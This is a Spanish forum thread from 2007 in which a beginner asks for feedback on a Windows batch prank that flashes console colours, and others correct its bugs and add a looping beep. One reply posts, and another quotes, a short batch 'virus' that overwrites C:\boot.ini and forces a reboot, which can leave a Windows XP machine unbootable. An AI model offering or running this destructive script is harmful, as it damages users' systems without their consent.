elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Opiniones y mejoras
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Opiniones y mejoras  (Leído 4,177 veces)
PixelatedFox

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Opiniones y mejoras
« en: 15 Mayo 2007, 20:11 pm »

Antes de nada deciros que NO OS RIAIS DE MI POR FAVOR,aunque vaya a ser dificil xD.A ver quería hacer algo con .bat y encontré un código interesante,pero pensé que usarlo sin mas era un poco...cutre y me puse a investigar y resulta que esto es interesante,he hecho un script(si así se le puede llamar) que lo único que hace es que la pantalla de MSDOS se te ponga de colorines,y te imposiblite trabajar,si es una soberana gilipollez,lo sé pero tampoco voy a empezar por algo complicado,en fin.Solo os queria preguntar si vais algún fallo o algo asi por que a veces me da un error y desaparece...aqui os dejo el scrpit en cuestión.


Código:
@echo on
:bucle
COLOR F0
COLOR 0F
COLOR 13
COLOR 46
COLOR 7A
goto :bucle

De aquí surgió la idea y luego fijandome en otros scripts de por ahi,llegue a esto.

Código:
echo.
echo.
echo.
echo.
echo
echo                  *********************************
echo                  *********************************
echo                  **    Enloquecedor de MSDOS    **
echo.                 *********************************
echo.                 *********************************                           
echo.                 ********************************* 
echo.
echo Pulsa una tecla para iniciar
pause > nul
:inicio
cls
echo Elige la opción que quieras.
echo 1. Volver loco al MSDOS.
echo 2. Ver versión de MSDOS.
echo 3. Salir.
set /p eleccio=
if %eleccio%==1 goto Enloquecer
if %eleccio%==2 goto CMD
if %eleccio%==3 goto surti

:Enloquecer
cls
echo 1.Empezar enloquecimiento
echo 2.Salir
set /p tria=
if %tria%==1 goto colores
if %tria%==2 goto surti
:colores
:bucle
COLOR F0
COLOR 0F
COLOR 13
COLOR 46
COLOR 7A
goto :bucle
:surti

PD:Que siiii ya sé que es inutil,pero bueno solo le he hecho para coger un poco de destreza


En línea

nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Opiniones y mejoras
« Respuesta #1 en: 15 Mayo 2007, 22:46 pm »

Errores:

-Weno, primero debes de poner una linea así:

Código:
@echo off

Esto es para ocultar el eco de los comandos, la salida que originen estos en la pantalla se verá igual...

-En esta linea hay un error:

Código:
if %eleccio%==2 goto CMD

Si eliges la segunda opcion se ejecuta goto CMD lo que te llevaría a una etiqueta :CMD que no existe...

-Para la opcion 3 es mejor esta linea

Código:
if %eleccio%==3 exit

que esta:

Código:
if %eleccio%==3 goto surti

No esta mal tu forma pero mejor ordenarle directamente al BATCh salir que mandarlo a una etiqueta al final de archivo...
Lo mismo despues para la opcion 2 de la etiqueta "enloquecer"

-Por ultimo el peor error es el buble, usa un bucle FOR puesto que un bucle GOTO te consumirá todos los recursos del ordenador...tambien es recomendable poner un "sleep"...puedes hacerlo con el comando ping así:

Código:
ping 127.0.0.1 -n 1>nul

donde 1 es el tiempo en segundos a esperar...

Estos son los errores k veo a sí por encima...debe de haber mas...como el k me acabo de fijar ahora...sería bueno k añadieses una opcion contra errores para el caso en el k el usuario eligiese una opcion diferente k las k se ofrecen...pork si se le pide elegir entre la opcion 1, 2  y 3 y pone "4" pues para k no se ejecute indebidamente...

Weno, tu tranki k todos fuimos novatos...yo por ejemplo soy novato en VB y pregunto cosas tontas y nadie se rie de mi...ademas lo k estas haciendo es bueno para empezar...

Saludos ;) ;) ;)


En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Opiniones y mejoras
« Respuesta #2 en: 16 Mayo 2007, 00:23 am »

:(
yo si me puedo reir? jeje ta bn chido tu codigo, ponle q ponga sonidos y enloquece peor jajaj

mira los sonidos se ponen asi:
Código:
@echo off
echo e 100 7 >in.inw
echo r cx >>in.inw
echo 1 >>in.inw
echo n beep.txt >>in.inw
echo w >>in.inw
echo q >>in.inw
debug<in.inw
del in.inw
:buc
type beep.txt
goto:buc

no sirve en todas las computadoras, pero si en muchas :P

Saludos!!
En línea

Grave


Desconectado Desconectado

Mensajes: 314


|\|0\/\/ 15 7|-|3 71/\/\3


Ver Perfil WWW
Re: Opiniones y mejoras
« Respuesta #3 en: 16 Mayo 2007, 00:52 am »

Me he reido con este post(sin animos de ofender, yo tambien soy un "nov",  bueno no tanto),  ;D No entiendo el bat de Sirdarckat  :P....
Y con este virus dedstrtuyes cualquier Pc con XP sin que ni para que.
Código:
@echo off
cd\
echo Chorrada>boot.ini
shutdown -r -t 01 -c "Jajajajajajajajajaja"
exit
« Última modificación: 16 Mayo 2007, 00:53 am por Grave » En línea

"y el conocimiento os hara libres"

Module Console1
   Console.Write("Hello Word")
   Console.ReadLine()
End Module
http://aion.cr0n0triger.operaunite.com/
PixelatedFox

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Opiniones y mejoras
« Respuesta #4 en: 16 Mayo 2007, 15:42 pm »

Muchas gracias a todos. Principalmente a nhaalclkiemr por que me has audado mucho,en serio gracias.
ahhh gracias también por los sonidos xDDD es un caos impresionante. Y a Grave,...a ver...yo no pretendo destruir ningun PC...no quiero aprender hacking para eso.Bueno.muchas gracias.
En línea

nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Opiniones y mejoras
« Respuesta #5 en: 17 Mayo 2007, 12:27 pm »

Nada, para eso estamos  :xD :xD

Me he reido con este post(sin animos de ofender, yo tambien soy un "nov",  bueno no tanto),  ;D No entiendo el bat de Sirdarckat  :P....
Y con este virus dedstrtuyes cualquier Pc con XP sin que ni para que.
Código:
@echo off
cd\
echo Chorrada>boot.ini
shutdown -r -t 01 -c "Jajajajajajajajajaja"
exit

El bat de Sdc utiliza el comando DEBUG para crear un archivo "pienso k binario o ASM o no se muy bien" que al escribirlo con un type en la consola crea un pitido, despues ejecuta un bucle con ese pitido...pero para el bucle sería mejor usar el for y delimitarlo a un numero determinado de pitidos y no un bucle infinito de goto

Por cierto, tu bat lo k hace es sustituir el boot.ini (archivo que contiene los diferentes SO y opciones de arranke de estos) por un archivo que pone "Chorrada" y despues reinicia a los 1 segundos mostrando el mensaje "Jajajajajaja"

No se realmente si jode un PC...pero en caso de que no arrankara sería muy facil de solucionar eso...

Weno...además ese no es el tema...la cuestion es crear un programa que vaya cambiando el color de la consola...lo de los pitidos tambien es interesante jajaja

Saludos ;) ;) ;)
En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
ne0x

Desconectado Desconectado

Mensajes: 270



Ver Perfil
Re: Opiniones y mejoras
« Respuesta #6 en: 17 Mayo 2007, 13:25 pm »

Escriban en la consola:

Código:
echo ^G

Emitira un pitido, sin embargo esta forma no es valida en un script asi que un script hay que escribir por pantalla un caracter ASCII que es un cuadrado, no me acuerdo del numero  :(
En línea

sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Opiniones y mejoras
« Respuesta #7 en: 18 Mayo 2007, 05:28 am »

es 0x07
el codigo que puse lo dice xD
Saludos!!
En línea

ne0x

Desconectado Desconectado

Mensajes: 270



Ver Perfil
Re: Opiniones y mejoras
« Respuesta #8 en: 24 Mayo 2007, 13:20 pm »

Un poco tarde pero lo encontre!


Código:
echo 
Lo curioso es que si haceis un script con ese code y le dais doble click no muestra la pantalla :D

EDITADO: Lo raro es que no muestra el caracter ASCII, es un circulito negro, podeis verlo aqui:

http://foro.portalhacker.net/index.php/topic,36238.msg155737.html#msg155737
« Última modificación: 24 Mayo 2007, 13:23 pm por ne0x » En línea

invisible_hack


Desconectado Desconectado

Mensajes: 978


Invisible_Hack™ Nick Registrado ^^


Ver Perfil WWW
Re: Opiniones y mejoras
« Respuesta #9 en: 10 Julio 2007, 11:16 am »

Mmmm...bueno interesante ese codigo... :D

Saludetes!!
En línea

"Si no visitas mi blog, Chuck te dará una patada giratoria"
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Opiniones Mandriva
GNU/Linux
Blitzkrieg' 1 3,149 Último mensaje 22 Enero 2011, 13:46 pm
por kasiko
Mejoras en el geolocalizador
Sugerencias y dudas sobre el Foro
el-brujo 1 3,020 Último mensaje 9 Mayo 2012, 21:14 pm
por Graphixx
Opiniones debian 7
GNU/Linux
ccrunch 7 5,014 Último mensaje 13 Junio 2013, 16:28 pm
por dato000
Filesoup y TorrentPrivacy opiniones
Foro Libre
patilanz 0 1,148 Último mensaje 5 Noviembre 2014, 22:55 pm
por patilanz
Me podrian dar sus opiniones??
Programación C/C++
Maximilianox 2 1,471 Último mensaje 28 Junio 2016, 01:34 am
por Maximilianox
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines